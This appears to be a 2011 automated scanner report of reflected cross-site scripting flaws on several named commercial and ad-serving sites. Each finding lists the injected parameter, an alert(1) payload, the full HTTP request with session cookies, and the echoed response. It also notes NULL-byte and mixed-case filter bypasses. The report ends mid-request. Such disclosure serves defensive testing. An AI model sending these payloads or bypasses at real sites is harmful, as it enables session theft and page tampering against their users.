<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="htt ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.d764b"><script>alert(1)</script>ff6160e5949"> ...[SNIP]...
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8a7"><script>alert(1)</script>e76a6b52e057de0cb was submitted in the email parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the password request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d019"><script>alert(1)</script>c69c47f83fc5ae963 was submitted in the password parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 was submitted in the from parameter. This input was echoed as 10afa"style="x:expression(alert(1))"6551a8508b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /sign-in.do?from=%0010afa"style%3d"x%3aexpression(alert(1))"6551a8508b2 HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:20:59 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 17147
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <a class="rollover" href="http://ecommerce.randomhouse.com/cart.do?from=.10afa"style="x:expression(alert(1))"6551a8508b2"> ...[SNIP]...
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ec7"><script>alert(1)</script>c88b024cdae was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 182e6"%3b566f826a9ff was submitted in the from parameter. This input was echoed as 182e6";566f826a9ff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sign-in.do?from=182e6"%3b566f826a9ff HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:02 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16907
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="182e6";566f826a9ff"; //--> ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f8e</script>0cfb073a38a was submitted in the from parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sign-in.do?from=b6f8e</script>0cfb073a38a HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:21:44 GMT Server: Apache Content-Type: text/html;charset=ISO-8859-1 Connection: close Content-Length: 16963
<!-- signIn.vm -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- // extract 'from' param var url = window.location.href; var paramStart = url.indexOf("?"); var fromParam = ''; if( 'b6f8e</script>0cfb073a38a' == '') { if( paramStart != -1) { var paramString = url.substr(paramStart + 1); var tokenStart = paramString.indexOf('from'); if( tokenStart != -1) { var token = paramString.substr(toke ...[SNIP]...
The value of the from request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8336"%3balert(1)//1decb9d5a21 was submitted in the from parameter. This input was echoed as a8336";alert(1)//1decb9d5a21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/ ...[SNIP]... <!-- var s_account="ranhcorporate,ranhrollup"; var rh_division="Random House Corporate"; var rh_imprint=""; var rh_store="randomhousea8336";alert(1)//1decb9d5a21"; //--> ...[SNIP]...
The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a312"><script>alert(1)</script>2753c92f034 was submitted in the ht parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad.php?do=html&zid=14678&wd=728&ht=903a312"><script>alert(1)</script>2753c92f034&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:52 GMT Server: AdSpeed/s10 Content-Length: 397
The value of the wd request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c was submitted in the wd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request
GET /ad.php?do=html&zid=14678&wd=7287da22"><ScRiPt>alert(1)</ScRiPt>f8712c21f3c&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1 Host: g.adspeed.net Proxy-Connection: keep-alive Referer: http://seclists.org/fulldisclosure/2011/Apr/388 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID" Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate Vary: Accept-Encoding Content-type: text/html Connection: close Date: Tue, 26 Apr 2011 21:51:50 GMT Server: AdSpeed/s10 Content-Length: 397
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b09e"><script>alert(1)</script>f7c22091cea was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D8b09e"><script>alert(1)</script>f7c22091cea&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4679e"-alert(1)-"a62aee2375a was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D4679e"-alert(1)-"a62aee2375a&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403aa"%3balert(1)//7cc5d18bab was submitted in the mpvc parameter. This input was echoed as 403aa";alert(1)//7cc5d18bab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=403aa"%3balert(1)//7cc5d18bab HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddc4"><script>alert(1)</script>a6ede4c7b5 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=5ddc4"><script>alert(1)</script>a6ede4c7b5 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c479"-alert(1)-"d9e31151018 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bec5d"%3balert(1)//31de559e8c0 was submitted in the mpvc parameter. This input was echoed as bec5d";alert(1)//31de559e8c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3fbec5d"%3balert(1)//31de559e8c0 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f6c"><script>alert(1)</script>3cb59412b55 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 879db<script>alert(1)</script>cb5517fdab7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/getByCode/salesCity?code=BOS&callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7 HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abc66<script>alert(1)</script>6d35eb2d05e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /geosearch/service/json/suggest/citiesAndAirports?name=b&callback=dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e HTTP/1.1 Host: matrix.itasoftware.com Proxy-Connection: keep-alive Referer: http://matrix.itasoftware.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 83c7a<script>alert(1)</script>1b026227aec was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 5d5d4<script>alert(1)</script>92fc2adddae was submitted in the name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
{}&&{"error":{"message":"Unrecognized search name \"specificDates5d5d4<script>alert(1)</script>92fc2adddae\".","resultId":"dRTmERQSGdEwBNSoA0DBeB","type":"input"}}
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload f3f22<script>alert(1)</script>35448f73c03 was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 1b93d<script>alert(1)</script>a1c82177a2e was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the summarizers request parameter is copied into the HTML document as plain text between tags. The payload 4722f<script>alert(1)</script>1af6d08d9bf was submitted in the summarizers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 511dc<script>alert(1)</script>f934d3d7cbc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=7&mbox=sidebar_global_phone511dc<script>alert(1)</script>f934d3d7cbc&mboxId=0&mboxTime=1303832144712&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 142 Date: Tue, 26 Apr 2011 20:59:38 GMT Server: Test & Target
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef was submitted in the mbox parameter. This input was echoed as 1c919<img src=a onerror=alert(1)>d785e4e61ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event1c919<img%20src%3da%20onerror%3dalert(1)>d785e4e61ef&mboxId=0&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target¤cyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 190 Date: Tue, 26 Apr 2011 21:03:53 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event1c919<img src=a onerror=alert(1)>d785e4e61ef', 0).setOffer(new mboxOfferDefault()).loaded();}
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload d3c5f<script>alert(1)</script>9584e60e0db was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1303850129880-628856&mboxPC=1303601743323-887111.17&mboxPage=1303850129880-628856&mboxCount=12&mbox=SiteCatalyst%3A%20event&mboxId=0d3c5f<script>alert(1)</script>9584e60e0db&mboxTime=1303832151203&charSet=UTF-8&visitorNamespace=omniturecom&cookieLifetime=31536000&pageName=Test%26Target¤cyCode=USD&channel=Products&server=www.omniture.com&events=event69&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1095&browserHeight=937&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&prop1=Non-Customer&eVar1=Non-Customer&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&eVar7=%2B1&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&eVar17=Data%20Not%20Available&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2Fproducts%2Fconversion%2Ftestandtarget&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1 Host: omnituremarketing.tt.omtrdc.net Proxy-Connection: keep-alive Referer: 